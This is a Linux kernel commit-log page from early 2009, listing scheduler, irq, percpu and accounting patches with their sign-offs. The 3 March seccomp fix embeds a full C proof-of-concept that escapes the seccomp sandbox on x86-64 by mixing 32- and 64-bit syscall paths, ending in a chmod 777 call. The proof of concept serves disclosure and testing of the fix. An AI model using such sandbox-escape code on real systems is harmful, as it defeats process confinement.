- 25 3月, 2009 13 次提交
-
-
由 Gautham R Shenoy 提交于
Impact: cleanup Add /** style comments around find_busiest_group(). Also add a few explanatory comments. This concludes the find_busiest_group() cleanup. The function is now down to 72 lines from the original 313 lines. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091427.13992.18933.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Create seperate helper functions to initialize the power-savings-balance related variables, to update them and to check if we have a scope for performing power-savings balance. Add no-op inline functions for the !(CONFIG_SCHED_MC || CONFIG_SCHED_SMT) case. This will eliminate all the #ifdef jungle in find_busiest_group() and the other helper functions. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091422.13992.73616.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup, micro-optimization We don't need to perform power_savings balance if either the cpu is NOT_IDLE or if the sched_domain doesn't contain the SD_POWERSAVINGS_BALANCE flag set. Currently, we check for these conditions multiple number of times, even though these variables don't change over the scope of find_busiest_group(). Check once, and store the value in the already exiting "power_savings_balance" variable. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091417.13992.2657.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Move all the imbalance calculation out of find_busiest_group() through this helper function. With this change, the structure of find_busiest_group() will be as follows: - update_sched_domain_statistics. - check if imbalance exits. - update imbalance and return busiest. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091411.13992.43293.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup We have two places in find_busiest_group() where we need to calculate the minor imbalance before returning the busiest group. Encapsulate this functionality into a seperate helper function. Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com> Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> LKML-Reference: <20090325091406.13992.54316.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Create a helper function named update_sd_lb_stats() to update the various sched_domain related statistics in find_busiest_group(). With this we would have moved all the statistics computation out of find_busiest_group(). Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com> Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> LKML-Reference: <20090325091401.13992.88737.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Currently we use a lot of local variables in find_busiest_group() to capture the various statistics related to the sched_domain. Group them together into a single data structure. This will help us to offload the job of updating the sched_domain statistics to a helper function. Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com> Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> LKML-Reference: <20090325091356.13992.25970.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Create a helper function named update_sg_lb_stats() which can be invoked to calculate the individual group's statistics in find_busiest_group(). This reduces the lenght of find_busiest_group() considerably. Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com> Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Aked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> LKML-Reference: <20090325091351.13992.43461.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Currently a whole bunch of variables are used to store the various statistics pertaining to the groups we iterate over in find_busiest_group(). Group them together in a single data structure and add appropriate comments. This will be useful later on when we create helper functions to calculate the sched_group statistics. Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com> Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> LKML-Reference: <20090325091345.13992.20099.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Some indentations in find_busiest_group() can minimized by using early exits with the help of gotos. This improves readability in a couple of cases. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091340.13992.45062.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Gautham R Shenoy 提交于
Impact: cleanup Currently the load idx calculation code is in find_busiest_group(). Move that to a static inline helper function. Similary, to find the first cpu of a sched_group we use cpumask_first(sched_group_cpus(group)) Use a helper to that. It improves readability in some cases. Signed-off-by: NGautham R Shenoy <ego@in.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Balbir Singh" <balbir@in.ibm.com> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com> Cc: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com> LKML-Reference: <20090325091335.13992.55424.stgit@sofia.in.ibm.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Jason Baron 提交于
This patch combines Greg Bank's dprintk() work with the existing dynamic printk patchset, we are now calling it 'dynamic debug'. The new feature of this patchset is a richer /debugfs control file interface, (an example output from my system is at the bottom), which allows fined grained control over the the debug output. The output can be controlled by function, file, module, format string, and line number. for example, enabled all debug messages in module 'nf_conntrack': echo -n 'module nf_conntrack +p' > /mnt/debugfs/dynamic_debug/control to disable them: echo -n 'module nf_conntrack -p' > /mnt/debugfs/dynamic_debug/control A further explanation can be found in the documentation patch. Signed-off-by: NGreg Banks <gnb@sgi.com> Signed-off-by: NJason Baron <jbaron@redhat.com> Signed-off-by: NGreg Kroah-Hartman <gregkh@suse.de>
-
由 Luis Henriques 提交于
Impact: cleanup, new schedstat ABI Since they are used on in statistics and are always set to zero, the following fields from struct rq have been removed: yld_exp_empty, yld_act_empty and yld_both_empty. Both Sched Debug and SCHEDSTAT_VERSION versions has also been incremented since ABIs have been changed. The schedtop tool has been updated to properly handle new version of schedstat: http://rt.wiki.kernel.org/index.php/Schedtop_utilitySigned-off-by: NLuis Henriques <henrix@sapo.pt> Acked-by: NGregory Haskins <ghaskins@novell.com> Acked-by: NPeter Zijlstra <peterz@infradead.org> LKML-Reference: <20090324221002.GA10061@hades.domain.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 24 3月, 2009 2 次提交
-
-
由 Oleg Nesterov 提交于
See http://bugzilla.kernel.org/show_bug.cgi?id=12911 copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus fastpath_timer_check() returns false unless we have other cpu timers. This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not optimal, we need further cleanups here. With this patch update_rlimit_cpu() is not really needed, but I don't think it should be removed. The proper fix (I think) is: - set_process_cpu_timer() should just start the cputimer->running logic (it does), no need to change cputime_expires.xxx_exp - posix_cpu_timers_init_group() should set ->running when needed - fastpath_timer_check() can check ->running instead of task_cputime_zero(signal->cputime_expires) Reported-by: NPeter Lojkin <ia6432@inbox.ru> Signed-off-by: NOleg Nesterov <oleg@redhat.com> Cc: Peter Zijlstra <peterz@infradead.org> Cc: Roland McGrath <roland@redhat.com> Cc: <stable@kernel.org> [for 2.6.29.x] LKML-Reference: <20090323193411.GA17514@redhat.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Miklos Szeredi 提交于
This patch fixes bug #12208: Bug-Entry : http://bugzilla.kernel.org/show_bug.cgi?id=12208 Subject : uml is very slow on 2.6.28 host This turned out to be not a scheduler regression, but an already existing problem in ptrace being triggered by subtle scheduler changes. The problem is this: - task A is ptracing task B - task B stops on a trace event - task A is woken up and preempts task B - task A calls ptrace on task B, which does ptrace_check_attach() - this calls wait_task_inactive(), which sees that task B is still on the runq - task A goes to sleep for a jiffy - ... Since UML does lots of the above sequences, those jiffies quickly add up to make it slow as hell. This patch solves this by not rescheduling in read_unlock() after ptrace_stop() has woken up the tracer. Thanks to Oleg Nesterov and Ingo Molnar for the feedback. Signed-off-by: NMiklos Szeredi <mszeredi@suse.cz> CC: stable@kernel.org Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 18 3月, 2009 2 次提交
-
-
由 Luis Henriques 提交于
The jiffies value was being printed for each CPU, which does not seem to make sense. Moved jiffies to system section. Signed-off-by: NLuis Henriques <henrix@sapo.pt> Acked-by: NPeter Zijlstra <peterz@infradead.org> LKML-Reference: <20090318000425.GA2228@hades.domain.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Masami Hiramatsu 提交于
Impact: fix ref-after-free crash on failed module load Fix refptr bug: Change refptr allocation and release order not to access a module data structure pointed by 'mod' after freeing mod->module_core. This bug will cause kernel panic(e.g. failed to find undefined symbols). This bug was reported on systemtap bugzilla. http://sources.redhat.com/bugzilla/show_bug.cgi?id=9927Signed-off-by: NMasami Hiramatsu <mhiramat@redhat.com> Cc: Eric Dumazet <dada1@cosmosbay.com> Signed-off-by: NRusty Russell <rusty@rustcorp.com.au>
-
- 17 3月, 2009 2 次提交
-
-
由 Luis Henriques 提交于
There were 3 invocations of task_hot() in can_migrate_task(). Replace these 3 invocations by only one invocation, cached in a local variable. Signed-off-by: NLuis Henriques <henrix@sapo.pt> LKML-Reference: <20090316195902.GA6197@hades.domain.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Luis Henriques 提交于
Fixed typos in function documentation. Signed-off-by: NLuis Henriques <henrix@sapo.pt> LKML-Reference: <20090316195809.GA6073@hades.domain.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 13 3月, 2009 3 次提交
-
-
由 Thomas Gleixner 提交于
Two years migration time is enough. Remove the compability cruft. Add the deprecated warning in kernel/irq/handle.c because marking __do_IRQ itself is way too noisy. Signed-off-by: NThomas Gleixner <tglx@linutronix.de> -
由 Thomas Gleixner 提交于
Impact: simplification Signed-off-by: NThomas Gleixner <tglx@linutronix.de> Reviewed-by: NPeter Zijlstra <peterz@infradead.org>
-
由 Thomas Gleixner 提交于
Impact: cleanup The code is only compiled if CONFIG_GENERIC_HARDIRQS=y so another check for this define in the code is redundant. Remove it. Signed-off-by: NThomas Gleixner <tglx@linutronix.de>
-
- 12 3月, 2009 3 次提交
-
-
由 Magnus Damm 提交于
Export the setup_irq() and remove_irq() symbols. I'd like to export these functions since I have timer code that needs to use setup_irq() early on (too early for request_irq()), and the same code can also be compiled as a module. Signed-off-by: NMagnus Damm <damm@igel.co.jp> LKML-Reference: <20090312120559.2926.82371.sendpatchset@rx1.opensource.se> [ changed to _GPL as these are special APIs deep inside the irq layer. ] Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Magnus Damm 提交于
Modify remove_irq() to match setup_irq(). Signed-off-by: NMagnus Damm <damm@igel.co.jp> LKML-Reference: <20090312120551.2926.43942.sendpatchset@rx1.opensource.se> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Magnus Damm 提交于
Impact: add new API This patch adds a remove_irq() function for releasing interrupts requested with setup_irq(). Without this patch we have no way of releasing such interrupts since free_irq() today tries to kfree() the irqaction passed with setup_irq(). Signed-off-by: NMagnus Damm <damm@igel.co.jp> LKML-Reference: <20090312120542.2926.56609.sendpatchset@rx1.opensource.se> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 11 3月, 2009 2 次提交
-
-
由 Mike Galbraith 提交于
Impact: more precise avg_overlap metric - better load-balancing avg_overlap is used to measure the runtime overlap of the waker and wakee. However, when a process changes behaviour, eg a pipe becomes un-congested and we don't need to go to sleep after a wakeup for a while, the avg_overlap value grows stale. When running we use the avg runtime between preemption as a measure for avg_overlap since the amount of runtime can be correlated to cache footprint. The longer we run, the less likely we'll be wanting to be migrated to another CPU. Signed-off-by: NMike Galbraith <efault@gmx.de> Signed-off-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> LKML-Reference: <1236709131.25234.576.camel@laptop> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Dhaval Giani 提交于
We were returning early in the sysfs directory cleanup function if the user belonged to a non init usernamespace. Due to this a lot of the cleanup was not done and we were left with a leak. Fix the leak. Reported-by: NSerge Hallyn <serue@linux.vnet.ibm.com> Signed-off-by: NDhaval Giani <dhaval@linux.vnet.ibm.com> Acked-by: NSerge Hallyn <serue@us.ibm.com> Tested-by: NSerge Hallyn <serue@us.ibm.com> Signed-off-by: NAndrew Morton <akpm@linux-foundation.org> Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 10 3月, 2009 2 次提交
-
-
由 Peter Zijlstra 提交于
Impact: micro-optimization We can avoid the sched domain walk on try_to_wake_up() when we know there are no groups. Signed-off-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> LKML-Reference: <1236603381.8389.455.camel@laptop> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Oleg Nesterov 提交于
CLONE_PARENT can fool the ->self_exec_id/parent_exec_id logic. If we re-use the old parent, we must also re-use ->parent_exec_id to make sure exit_notify() sees the right ->xxx_exec_id's when the CLONE_PARENT'ed task exits. Also, move down the "p->parent_exec_id = p->self_exec_id" thing, to place two different cases together. Signed-off-by: NOleg Nesterov <oleg@redhat.com> Cc: Roland McGrath <roland@redhat.com> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: David Howells <dhowells@redhat.com> Cc: Serge E. Hallyn <serge@hallyn.com> Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 09 3月, 2009 1 次提交
-
-
由 Heiko Carstens 提交于
Frans Pop reported the crash below when running an s390 kernel under Hercules: Kernel BUG at 000738b4 verbose debug info unavailable! fixpoint divide exception: 0009 #1! SMP Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot dm_mod dasd_eckd_mod dasd_mod CPU: 0 Not tainted 2.6.27.19 #13 Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18) Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0 Krnl GPRS: 00000000 000007d0 7fffffff fffff830 00000000 ffffffff 00000002 0f9ed9b8 00000000 00008ca0 00000000 0f9ed9b8 0f9edda4 8007386e 0f4f7ec8 0f4f7e98 Krnl Code: 800738aa: a71807d0 lhi %r1,2000 800738ae: 8c200001 srdl %r2,1 800738b2: 1d21 dr %r2,%r1 >800738b4: 5810d10e l %r1,270(%r13) 800738b8: 1823 lr %r2,%r3 800738ba: 4130f060 la %r3,96(%r15) 800738be: 0de1 basr %r14,%r1 800738c0: 5800f060 l %r0,96(%r15) Call Trace: ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c) <0000000000038502>! do_exit+0x106/0x7c0 <0000000000038c36>! do_group_exit+0x7a/0xb4 <0000000000038c8e>! SyS_exit_group+0x1e/0x30 <0000000000021c28>! sysc_do_restart+0x12/0x16 <0000000077e7e924>! 0x77e7e924 Reason for this is that cpu time accounting usually only happens from interrupt context, but acct_update_integrals gets also called from process context with interrupts enabled. So in acct_update_integrals we may end up with the following scenario: Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt happens which updates accouting values. This causes acct_timexpd to be greater than the former stime + utime. The subsequent calculation of dtime = cputime_sub(time, tsk->acct_timexpd); will be negative and the division performed by cputime_to_jiffies(dtime) will generate an exception since the result won't fit into a 32 bit register. In order to fix this just always disable interrupts while accessing any of the accounting values. Reported by: Frans Pop <elendil@planet.nl> Tested by: Frans Pop <elendil@planet.nl> Cc: stable@kernel.org Cc: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: NHeiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 06 3月, 2009 2 次提交
-
-
由 Lai Jiangshan 提交于
Impact: cleanup Use test_tsk_need_resched(), set_tsk_need_resched(), need_resched() instead of using TIF_NEED_RESCHED. Signed-off-by: NLai Jiangshan <laijs@cn.fujitsu.com> Cc: Peter Zijlstra <a.p.zijlstra@chello.nl> LKML-Reference: <49B10BA4.9070209@cn.fujitsu.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Tejun Heo 提交于
Impact: add reserved allocation functionality and use it for module percpu variables This patch implements reserved allocation from the first chunk. When setting up the first chunk, arch can ask to set aside certain number of bytes right after the core static area which is available only through a separate reserved allocator. This will be used primarily for module static percpu variables on architectures with limited relocation range to ensure that the module perpcu symbols are inside the relocatable range. If reserved area is requested, the first chunk becomes reserved and isn't available for regular allocation. If the first chunk also includes piggy-back dynamic allocation area, a separate chunk mapping the same region is created to serve dynamic allocation. The first one is called static first chunk and the second dynamic first chunk. Although they share the page map, their different area map initializations guarantee they serve disjoint areas according to their purposes. If arch doesn't setup reserved area, reserved allocation is handled like any other allocation. Signed-off-by: NTejun Heo <tj@kernel.org>
-
- 05 3月, 2009 2 次提交
-
-
由 Frederic Weisbecker 提交于
Impact: fix function graph trace hang / drop pointless softirq on UP While debugging a function graph trace hang on an old PII, I saw that it consumed most of its time on the timer interrupt. And the domain rebalancing softirq was the most concerned. The timer interrupt calls trigger_load_balance() which will decide if it is worth to schedule a rebalancing softirq. In case of builtin UP kernel, no problem arises because there is no domain question. In case of builtin SMP kernel running on an SMP box, still no problem, the softirq will be raised each time we reach the next_balance time. In case of builtin SMP kernel running on a UP box (most distros provide default SMP kernels, whatever the box you have), then the CPU is attached to the NULL sched domain. So a kind of unexpected behaviour happen: trigger_load_balance() -> raises the rebalancing softirq later on softirq: run_rebalance_domains() -> rebalance_domains() where the for_each_domain(cpu, sd) is not taken because of the NULL domain we are attached at. Which means rq->next_balance is never updated. So on the next timer tick, we will enter trigger_load_balance() which will always reschedule() the rebalacing softirq: if (time_after_eq(jiffies, rq->next_balance)) raise_softirq(SCHED_SOFTIRQ); So for each tick, we process this pointless softirq. This patch fixes it by checking if we are attached to the null domain before raising the softirq, another possible fix would be to set the maximal possible JIFFIES value to rq->next_balance if we are attached to the NULL domain. v2: build fix on UP Signed-off-by: NFrederic Weisbecker <fweisbec@gmail.com> Cc: Steven Rostedt <rostedt@goodmis.org> Cc: Peter Zijlstra <peterz@infradead.org> LKML-Reference: <49af242d.1c07d00a.32d5.ffffc019@mx.google.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Eric Dumazet 提交于
If a machine is flooded by network frames, a cpu can loop 100% of its time inside ksoftirqd() without calling schedule(). This can delay RCU grace period to insane values. Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem. Paul: "This regression was a result of the recent change from "schedule()" to "cond_resched()", which got rid of that quiescent state in the common case where a reschedule is not needed". Signed-off-by: NEric Dumazet <dada1@cosmosbay.com> Reviewed-by: NPaul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: NAndrew Morton <akpm@linux-foundation.org> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 03 3月, 2009 2 次提交
-
-
由 Roland McGrath 提交于
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: NRoland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org> -
由 Peter Zijlstra 提交于
Make sure the genirq layer handlers are indeed running handlers in hardirq context. That is the genirq expectation and doing anything else is broken. Signed-off-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Cc: Andrew Morton <akpm@linux-foundation.org> LKML-Reference: <1236006812.5330.632.camel@laptop> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 02 3月, 2009 1 次提交
-
-
由 Wang Chen 提交于
Impact: micro-optimization Parameter "prev" is not used really. Signed-off-by: NWang Chen <wangchen@cn.fujitsu.com> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
- 28 2月, 2009 1 次提交
-
-
由 David Howells 提交于
free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction. Fix this by deferring the destruction of the user_namespace. Signed-off-by: NDavid Howells <dhowells@redhat.com> Acked-by: NSerge Hallyn <serue@us.ibm.com> Signed-off-by: NAndrew Morton <akpm@linux-foundation.org> Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 27 2月, 2009 2 次提交
-
-
由 Dhaval Giani 提交于
Impact: fix hung task with certain (non-default) rt-limit settings Corey Hickey reported that on using setuid to change the uid of a rt process, the process would be unkillable and not be running. This is because there was no rt runtime for that user group. Add in a check to see if a user can attach an rt task to its task group. On failure, return EINVAL, which is also returned in CONFIG_CGROUP_SCHED. Reported-by: NCorey Hickey <bugfood-ml@fatooh.org> Signed-off-by: NDhaval Giani <dhaval@linux.vnet.ibm.com> Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl> Signed-off-by: NIngo Molnar <mingo@elte.hu>
-
由 Serge E. Hallyn 提交于
per-uid keys were looked by uid only. Use the user namespace to distinguish the same uid in different namespaces. This does not address key_permission. So a task can for instance try to join a keyring owned by the same uid in another namespace. That will be handled by a separate patch. Signed-off-by: NSerge E. Hallyn <serue@us.ibm.com> Acked-by: NDavid Howells <dhowells@redhat.com> Signed-off-by: NJames Morris <jmorris@namei.org>
-